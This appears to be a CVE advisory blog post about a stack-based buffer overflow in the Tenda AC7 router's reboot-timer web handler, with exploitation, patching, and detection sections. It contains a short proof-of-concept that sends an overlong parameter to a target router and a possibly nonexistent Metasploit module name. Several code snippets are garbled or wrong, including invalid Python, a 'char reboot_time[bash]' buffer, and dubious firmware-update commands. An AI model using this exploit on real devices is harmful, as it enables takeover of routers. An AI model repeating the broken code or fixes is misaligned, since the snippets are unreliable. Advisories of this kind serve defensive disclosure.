Tenda AC7, Stack-Based Buffer Overflow, CVE-2025-4810 (Critical)

Listen to this Post

How CVE-2025-4810 Works

The vulnerability in Tenda AC7 routers (firmware v15.03.06.44) resides in the `formSetRebootTimer` function within /goform/SetRebootTimer. A stack-based buffer overflow occurs due to improper validation of the `reboot_time` parameter. Attackers can remotely send an excessively long string to this parameter, overwriting the stack and potentially executing arbitrary code. Since the router’s web interface lacks proper input sanitization, unauthenticated attackers can exploit this flaw to gain control over the device.

DailyCVE Form

Platform: Tenda AC7
Version: 15.03.06.44
Vulnerability: Stack overflow
Severity: Critical
Date: 05/16/2025

What Undercode Say:

Exploitation

1. Craft malicious payload:

import requests
url = "http://<TARGET_IP>/goform/SetRebootTimer"
payload = "A" 500 Overflow trigger
data = {"reboot_time": payload}
requests.post(url, data=data)

2. Metasploit module (if available):

use exploit/linux/http/tenda_ac7_reboottimer_overflow
set RHOST <TARGET_IP>
exploit

Protection

1. Patch firmware:

wget https://www.tenda.com.cn/download/firmware/AC7_15.03.06.45.zip
unzip AC7_15.03.06.45.zip
sysupgrade /path/to/firmware.bin

2. Block external access:

iptables -A INPUT -p tcp --dport 80 -j DROP

3. Input validation (developer fix):

void formSetRebootTimer() {
char reboot_time[bash];
strncpy(reboot_time, get_param("reboot_time"), sizeof(reboot_time)-1);
}

Detection

1. Check logs for overflow attempts:

grep -i "reboot_time" /var/log/httpd.log | awk '{print $NF}' | sort | uniq -c

2. Network monitoring:

tcpdump -i eth0 'port 80 and (tcp[20:4] = 0x7265626f)' -w reboot_exploit.pcap

Analytics

  • CVSS Score: 9.8 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
  • Exploitability: Remote, low complexity
  • Impact: Full device compromise

References

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

Join Our Cyber World:

💬 Whatsapp | 💬 TelegramFeatured Image

Scroll to Top